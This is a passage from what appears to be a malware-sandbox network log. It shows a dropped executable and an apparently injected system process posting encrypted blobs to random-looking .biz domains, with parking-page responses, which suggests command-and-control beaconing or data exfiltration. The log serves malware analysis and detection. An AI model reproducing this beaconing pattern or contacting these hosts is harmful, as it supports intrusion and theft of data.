Dec 31, 2024 09:05:12.410016060 CET	360	OUT	GET /xpqdcslnor?usid=27&utid=10221865676 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Host: ww7.przvgke.biz
Dec 31, 2024 09:05:12.885021925 CET	1236	IN	HTTP/1.1 200 OK date: Tue, 31 Dec 2024 08:05:12 GMT content-type: text/html; charset=utf-8 content-length: 1142 x-request-id: 2af85481-75e5-46e5-8346-bf12d36d51a1 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_tYasp0FAypW1PlS683E3SzZz8Q1pzaCUZXbpWFvp1dPbARSFjAVSYUFAv0nWdn/AUFBcd0QBqIzJyZyLPu1aWg== set-cookie: parking_session=2af85481-75e5-46e5-8346-bf12d36d51a1; expires=Tue, 31 Dec 2024 08:20:12 GMT; path=/ Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 74 59 61 73 70 30 46 41 79 70 57 31 50 6c 53 36 38 33 45 33 53 7a 5a 7a 38 51 31 70 7a 61 43 55 5a 58 62 70 57 46 76 70 31 64 50 62 41 52 53 46 6a 41 56 53 59 55 46 41 76 30 6e 57 64 6e 2f 41 55 46 42 63 64 30 51 42 71 49 7a 4a 79 5a 79 4c 50 75 31 61 57 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_tYasp0FAypW1PlS683E3SzZz8Q1pzaCUZXbpWFvp1dPbARSFjAVSYUFAv0nWdn/AUFBcd0QBqIzJyZyLPu1aWg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
Dec 31, 2024 09:05:12.885037899 CET	576	IN	Data Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMmFmODU0ODEtNzVlNS00NmU1LTgzNDYtYmYxMmQzNmQ1MWExIiwicGFnZV90aW1lIjoxNzM1NjMyMzEyLCJwYWdlX3VybCI6I

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49748	13.248.148.254	80	7304	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:05:13.122314930 CET	354	OUT	GET /ewl?usid=27&utid=10221865931 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Host: ww12.przvgke.biz
Dec 31, 2024 09:05:13.783236027 CET	825	IN	HTTP/1.1 200 OK Accept-Ch: viewport-width Accept-Ch: dpr Accept-Ch: device-memory Accept-Ch: rtt Accept-Ch: downlink Accept-Ch: ect Accept-Ch: ua Accept-Ch: ua-full-version Accept-Ch: ua-platform Accept-Ch: ua-platform-version Accept-Ch: ua-arch Accept-Ch: ua-model Accept-Ch: ua-mobile Accept-Ch-Lifetime: 30 Content-Type: text/html; charset=UTF-8 Date: Tue, 31 Dec 2024 08:05:13 GMT Server: Caddy Server: nginx Vary: Accept-Encoding X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_RtrS/KKFneZo5cv6+d4nRe2w9G3hqDhkP8peaNeNpme9RV4Iyxc9teSaNQJNaGJ606Zu2/Le+X6RszW0L05rXw== X-Domain: przvgke.biz X-Pcrew-Blocked-Reason: X-Pcrew-Ip-Organization: CenturyLink X-Subdomain: ww12 Transfer-Encoding: chunked
Dec 31, 2024 09:05:13.783318996 CET	1236	IN	Data Raw: 33 64 61 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 71 75 44 Data Ascii: 3da0<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_RtrS/KKFneZo5cv6+d4nRe2w9G3hqDhkP8peaNeNpme9RV4Iyxc9teSaNQJNaGJ606Zu2
Dec 31, 2024 09:05:13.783350945 CET	1236	IN	Data Raw: 67 69 6e 3a 30 20 30 20 33 70 78 20 32 30 70 78 3b 0a 7d 0a 0a 2e 73 69 74 65 6c 69 6e 6b 48 6f 6c 64 65 72 20 7b 0a 09 6d 61 72 67 69 6e 3a 2d 31 35 70 78 20 30 20 31 35 70 78 20 33 35 70 78 3b 0a 7d 0a 0a 23 61 6a 61 78 6c 6f 61 64 65 72 48 6f Data Ascii: gin:0 0 3px 20px;}.sitelinkHolder {margin:-15px 0 15px 35px;}#ajaxloaderHolder {display: block;width: 24px;height: 24px;background: #fff;padding: 8px 0 0 8px;margin:10px auto;-webkit-border-radius: 4px;-moz-border-radiu
Dec 31, 2024 09:05:13.783364058 CET	448	IN	Data Raw: 3b 0a 7d 0a 0a 2e 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 36 32 36 35 37 34 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 32 72 65 6d 20 31 72 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 72 65 6d 3b 0a 20 20 20 20 Data Ascii: ;}.footer { color:#626574; padding:2rem 1rem; font-size:.8rem; margin:0 auto; max-width:440px;}.footer a:link,.footer a:visited { color:#626574;}.sale_link_bold a,.sale_link,.sale_link a { color:#626574
Dec 31, 2024 09:05:13.783376932 CET	1176	IN	Data Raw: 20 20 20 20 63 6f 6c 6f 72 3a 20 23 38 34 38 34 38 34 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 63 6f 6d 70 2d 73 70 6f 6e 73 6f 72 65 64 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 Data Ascii: color: #848484; } .comp-sponsored { margin-left: 0; } .wrapper1 { max-width:1500px; margin-left:auto; margin-right:auto; } .wrapper2 { background:url('//d38psrni17bvxu.cloudf
Dec 31, 2024 09:05:13.783432007 CET	1236	IN	Data Raw: 39 7a 64 6d 63 69 49 47 68 6c 61 57 64 6f 64 44 30 69 4d 6a 51 69 49 48 5a 70 5a 58 64 43 62 33 67 39 49 6a 41 67 4d 43 41 79 4e 43 41 79 4e 43 49 67 64 32 6c 6b 64 47 67 39 49 6a 49 30 49 6a 34 38 63 47 46 30 61 43 42 6b 50 53 4a 4e 4d 43 41 77 Data Ascii: 9zdmciIGhlaWdodD0iMjQiIHZpZXdCb3g9IjAgMCAyNCAyNCIgd2lkdGg9IjI0Ij48cGF0aCBkPSJNMCAwaDI0djI0SDB6IiBmaWxsPSJub25lIi8+PHBhdGggZD0iTTUuODggNC4xMkwxMy43NiAxMmwtNy44OCA3Ljg4TDggMjJsMTAtMTBMOCAyeiIvPjwvc3ZnPg==');}</style> <meta name="og:descript
Dec 31, 2024 09:05:13.783477068 CET	1236	IN	Data Raw: 3d 6e 6f 2c 73 74 61 74 75 73 3d 79 65 73 2c 74 6f 6f 6c 62 61 72 3d 6e 6f 27 29 2e 66 6f 63 75 73 28 29 22 20 63 6c 61 73 73 3d 22 70 72 69 76 61 63 79 2d 70 6f 6c 69 63 79 22 3e 0a 20 20 20 20 50 72 69 76 61 63 79 20 50 6f 6c 69 63 79 0a 3c 2f Data Ascii: =no,status=yes,toolbar=no').focus()" class="privacy-policy"> Privacy Policy</a><br/><br/><br/><br/> </div></div><script type="text/javascript" language="JavaScript"> var tcblock = { // Required and steady 'con
Dec 31, 2024 09:05:13.783489943 CET	1236	IN	Data Raw: 3b 20 20 20 20 20 20 20 20 20 6c 65 74 20 75 6e 69 71 75 65 54 72 61 63 6b 69 6e 67 49 44 3d 27 4d 54 63 7a 4e 54 59 7a 4d 6a 4d 78 4d 79 34 32 4d 54 6b 35 4f 6a 55 30 4f 57 52 69 4e 44 67 77 4e 6a 5a 6d 4d 7a 6b 78 4d 47 4e 6d 4e 54 41 33 4d 44 Data Ascii: ; let uniqueTrackingID='MTczNTYzMjMxMy42MTk5OjU0OWRiNDgwNjZmMzkxMGNmNTA3MDBmMGEzMzg0MzFmYjA4NjE0ODExYWNiOTJlNzQ4ZTg0YjZhNWYxMWY5MjQ6Njc3M2E1Yjk5NzU0ZA=='; let search=''; let themedata='fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2
Dec 31, 2024 09:05:13.783524036 CET	672	IN	Data Raw: 27 61 64 74 65 73 74 27 3a 20 74 72 75 65 2c 27 63 6c 69 63 6b 74 72 61 63 6b 55 72 6c 27 3a 20 27 2f 2f 27 20 2b 20 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 74 72 61 63 6b 2e 70 68 70 3f 27 2c 27 61 74 74 72 69 62 75 74 69 6f 6e 54 Data Ascii: 'adtest': true,'clicktrackUrl': '//' + location.host + '/track.php?','attributionText': 'Ads','colorAttribution': '#b7b7b7','fontSizeAttribution': 16,'attributionBold': false,'rolloverLinkBold': false,'fontFamilyAttribution': 'arial','adLoaded
Dec 31, 2024 09:05:13.783554077 CET	1236	IN	Data Raw: 6f 6d 70 6f 6e 65 6e 74 28 64 6f 6d 61 69 6e 29 2b 20 22 26 64 61 74 61 3d 22 20 2b 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 64 61 74 61 29 29 29 3b 7d 7d 2c 27 70 61 67 65 4c 6f 61 Data Ascii: omponent(domain)+ "&data=" + encodeURIComponent(JSON.stringify(data)));}},'pageLoadedCallback': function (requestAccepted, status) {document.body.style.visibility = 'visible';pageLoadedCallbackTriggered = true;if ((status.faillisted === true \|
Dec 31, 2024 09:05:13.788309097 CET	1236	IN	Data Raw: 6d 65 3d 22 20 2b 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 6d 61 69 6e 29 20 2b 20 22 26 6f 75 74 70 75 74 3d 68 74 6d 6c 26 64 72 69 64 3d 22 20 2b 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 70 61 67 65 Data Ascii: me=" + encodeURIComponent(domain) + "&output=html&drid=" + encodeURIComponent(pageOptions.domainRegistrant));}}if (status.needsreview === true \|\| status.needsreview == "true") {ajaxQuery(scriptPath + "/track.php?domain=" + encodeURIComponent(d

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49749	18.141.10.107	80	7304	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:05:14.148864985 CET	357	OUT	POST /tnupafomghuok HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: knjghuig.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Dec 31, 2024 09:05:14.148880005 CET	778	OUT	Data Raw: 7b 5d 25 33 ca f6 0e a0 fe 02 00 00 c3 55 0c 9b ae d0 c1 e3 4d 8a cf 6b 9d 10 47 a0 16 e4 a6 07 ff 9e c7 96 c6 39 ee 2b b4 31 48 65 68 9e c0 4c c7 d2 bd 50 9b 11 bc 98 bd 84 e2 26 37 b1 ab b7 a1 c6 e9 c1 9f f5 55 a2 bb 6e 83 4e 9d d9 16 63 15 5e Data Ascii: {]%3UMkG9+1HehLP&7UnNc^YX2ku~V31coqnQ>%H'DzOZ7!n@N]3VMUy\}y:lx#Y{fBFC6i%eA)
Dec 31, 2024 09:05:15.509002924 CET	412	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 08:05:15 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=636597c15fb1ebe7e5832361c5ce2f08\|8.46.123.189\|1735632315\|1735632315\|0\|1\|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49750	82.112.184.197	80	7304	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:05:15.711412907 CET	351	OUT	POST /yrkakyyuj HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lpuegx.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Dec 31, 2024 09:05:15.711412907 CET	778	OUT	Data Raw: 06 dc 0c 17 12 fc 21 b7 fe 02 00 00 87 05 57 67 70 30 d1 0a 5d 8d 6a 9c 00 76 0a 34 1c 60 6d e2 92 24 d0 60 58 af 06 db 1e cf a6 8c 66 ca 77 02 8a a7 a7 d0 dc 04 13 cf 66 2f 31 fa fd e4 9e 82 a8 13 3d 9a e9 74 6f 85 8f b8 8c cf 08 18 ef 81 fd 7e Data Ascii: !Wgp0]jv4`m$`Xfwf/1=to~0KQ};aJMQKWG531QO.iF6lmA\k4:aP[t5,$D6oel5x4OayBt3MM@t72FNM

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49753	54.244.188.177	80	7204	C:\Users\user\AppData\Roaming\zeXKjViL.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:05:26.305097103 CET	348	OUT	POST /yos HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 812
Dec 31, 2024 09:05:26.305097103 CET	812	OUT	Data Raw: 1a c6 ea 76 95 e1 32 14 20 03 00 00 40 e7 7b b1 c8 42 39 56 d0 da 06 9c c9 13 61 85 28 43 5b 8b 5e a3 49 a5 1e d3 4c 09 37 b1 36 a2 ef 33 18 07 a5 ba 84 95 98 e0 f8 8b a0 6f d3 65 cb fe 72 24 ac b0 84 d2 10 39 17 8d 8d c6 e8 40 b1 c3 9d 03 b4 58 Data Ascii: v2 @{B9Va(C[^IL763oer$9@XUR2:;'yW%OHwYWVp"a,p/ +tRXT["4/Q09?gavK7i[Yxb^1^fm@t+.qA
Dec 31, 2024 09:05:26.970252037 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 08:05:26 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=6aed37bc7c8851a4e73febe4c23e08ff\|8.46.123.189\|1735632326\|1735632326\|0\|1\|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49754	18.141.10.107	80	7204	C:\Users\user\AppData\Roaming\zeXKjViL.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:05:27.254966974 CET	353	OUT	POST /snkwxvqngv HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ssbzmoy.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 812
Dec 31, 2024 09:05:27.255022049 CET	812	OUT	Data Raw: 5b ea b6 9c fd d1 dd cf 20 03 00 00 c6 b5 0d 3c 4a f1 de 4f 9b 98 97 9b 32 85 18 38 15 b8 df ba 70 d2 f7 e8 c1 99 3f de e0 5e ef 1b 51 6d 48 97 80 fe 72 ee ee d8 8e 49 5b 4e 74 fe 1f 99 50 f4 f0 af e5 9f 98 20 ab f1 d2 d2 39 dc 50 c4 9f 9d cf 89 Data Ascii: [ <JO28p?^QmHrI[NtP 9PiBS0/3C,k:;S=2FU4n9<MUcpDcpHNZ@n`M(ZIO*}4arMI.YARpPEfGV+=-S)fF{lov<
Dec 31, 2024 09:05:28.643241882 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 08:05:28 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=77c5807af2aef087a0bf567d51c47212\|8.46.123.189\|1735632328\|1735632328\|0\|1\|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49755	54.244.188.177	80	7204	C:\Users\user\AppData\Roaming\zeXKjViL.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:05:28.717487097 CET	346	OUT	POST /wthge HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: cvgrf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 812
Dec 31, 2024 09:05:28.717533112 CET	812	OUT	Data Raw: e4 84 d7 b7 41 14 74 3d 20 03 00 00 83 f0 46 88 c4 c5 ef ce 32 63 76 f1 e2 e7 1a 0c d2 da a2 ca 64 70 52 85 6f 5e ad 52 aa 01 2f a2 0e 7f d1 d1 f0 d0 02 68 6c 62 f4 d0 57 23 99 3b 88 d0 76 17 c2 58 3d 83 7e 22 6d e6 68 39 f7 51 63 3c 7b e1 49 dd Data Ascii: At= F2cvdpRo^R/hlbW#;vX=~"mh9Qc<{IZiBqoj?_"v7A$.Y8fQ+ZH[Vv?D@_uj*FV4;M{'^yXcqmHo2`rQy^Q6+`edq
Dec 31, 2024 09:05:29.413979053 CET	409	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 08:05:29 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=c2d2d868bc2aefd064ef0dd8691495ae\|8.46.123.189\|1735632329\|1735632329\|0\|1\|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49756	44.221.84.105	80	7204	C:\Users\user\AppData\Roaming\zeXKjViL.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:05:29.455081940 CET	359	OUT	POST /tloalmkxssnuris HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: npukfztj.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 812
Dec 31, 2024 09:05:29.455107927 CET	812	OUT	Data Raw: be 68 dd 93 e2 8f ef 06 20 03 00 00 98 1b b3 57 49 e8 bf ac f7 44 2c c7 10 4b 59 67 76 51 93 5c 8c af db f8 8c 9a 18 ea 01 b5 fa 73 1b 8d a0 d2 28 ac cb 6c c2 1e fa 77 7c a9 e1 d7 95 f5 c6 44 c3 14 59 06 d9 45 52 f4 e2 7d f4 19 1f dd 74 b9 21 1d Data Ascii: h WID,KYgvQ\s(lw\|DYER}t!Yd2$ T_(z4VgHVdiDxnlI7W"Esux>eQFtM,=wqW)n2nv1hz"yAN%rd+1
Dec 31, 2024 09:05:29.910830975 CET	412	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 08:05:29 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=06c88b09eab632a43c1fe24521a91b46\|8.46.123.189\|1735632329\|1735632329\|0\|1\|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49757	72.52.178.23	80	7204	C:\Users\user\AppData\Roaming\zeXKjViL.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:05:29.935894012 CET	350	OUT	POST /ehlglgm HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 812
Dec 31, 2024 09:05:29.935916901 CET	812	OUT	Data Raw: 36 04 ad 26 4f 43 8a ff 20 03 00 00 48 62 91 8a 01 42 0a 50 39 15 e7 e8 a8 57 1d c5 52 5f 4e 42 55 e2 5a cd c8 5f 4d 58 ff 9a a9 f5 ac 1c 06 cf 81 8a 9d 1f cb b6 81 2c 0b 54 7b 5c 9d 19 95 d5 2a 74 4a cc b9 d3 81 78 d7 12 da 4a f6 c4 ce 64 de d0 Data Ascii: 6&OC HbBP9WR_NBUZ_MX,T{\tJxJdGJFXk~QVoQ}06PmV6L~PEg/.S_j1AG@.6y{aj6/V:C8w0oFM36LGEn`S<?JA]ENRTgC]H>d9j;
Dec 31, 2024 09:05:30.518603086 CET	281	IN	HTTP/1.1 302 Moved Temporarily Date: Tue, 31 Dec 2024 08:05:30 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive Location: http://ww7.przvgke.biz/ehlglgm?usid=27&utid=10221870153 Cache-Control: no-cache Pragma: no-cache Access-Control-Allow-Origin: *

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49758	82.112.184.197	80	7304	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:05:37.351835012 CET	356	OUT	POST /htmlawrabimntg HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lpuegx.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Dec 31, 2024 09:05:37.351850986 CET	778	OUT	Data Raw: c2 0e 65 de 68 99 88 64 fe 02 00 00 24 99 9d 72 cd c4 ff ff 5d 7a 3d e7 1b 1e 94 a8 a9 69 88 db 42 c8 1d e8 3f ac ab ca 3b fd 0d 32 2f 6c 85 9e b5 59 02 df de a5 a1 60 5d 6c 2c 56 d3 cc 32 bf a7 22 01 1d 99 81 7e cf ad c0 31 fa 00 7c 6a 4d e4 ae Data Ascii: ehd$r]z=iB?;2/lY`]l,V2"~1\|jMEE8:R]r4IHkYa`9x9rAMy":4xEew9C1=`)zJ{J{sMs/:{mq"@Z=Q8Y\|'>/{Xp

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49759	82.112.184.197	80	7304	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:05:39.054828882 CET	356	OUT	POST /mxuujpbjwek HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vjaxhpbji.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Dec 31, 2024 09:05:39.054912090 CET	778	OUT	Data Raw: de 2e 38 16 b7 98 5b cf fe 02 00 00 90 14 b5 1e a4 de 95 9c 12 61 2a 71 ca 60 12 22 e3 22 9f a1 0d f3 82 4a 15 c9 59 1d 1a 8d 4a a5 45 b8 03 a8 5a 58 5d 3e 4c 2b 1a c2 f0 3d 5c c2 95 5d b8 79 f4 71 ab e4 66 b9 26 9e 1f eb d6 13 65 b5 f7 42 84 4b Data Ascii: .8[aq`""JYJEZX]>L+=\]yqf&eBK~@t5&"0gP0%)>vT]YdFE<S}Oe^#h]HF~mhy7enl)'._ET.=ttz*,{~D:b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49773	82.112.184.197	80	7304	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:06:00.557631969 CET	347	OUT	POST /ms HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vjaxhpbji.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
